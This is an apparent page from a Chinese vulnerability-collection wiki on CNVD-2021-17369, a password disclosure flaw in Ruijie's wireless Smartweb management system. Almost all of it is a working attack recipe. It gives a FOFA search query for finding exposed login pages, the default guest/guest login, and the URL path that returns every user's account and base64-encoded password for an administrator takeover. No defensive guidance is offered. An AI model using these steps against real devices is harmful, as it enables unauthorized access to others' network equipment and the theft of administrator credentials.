menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right 锐捷Smartweb管理系统 密码信息泄露 CNVD-2021-17369.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    锐捷Smartweb管理系统 密码信息泄露 CNVD-2021-17369.md
    551 B / 2021-05-21 09:14:38
        # 锐捷Smartweb管理系统 密码信息泄露 CNVD-2021-17369

锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。

FOFA:

`title="无线smartWeb--登录页面"`

默认guest账户密码:guest/guest


登录后访问:`http://target/web/xml/webuser-auth.xml`

获取所有用户账号密码,base64解码即可。

ref:

* https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ
* https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
    links
    file_download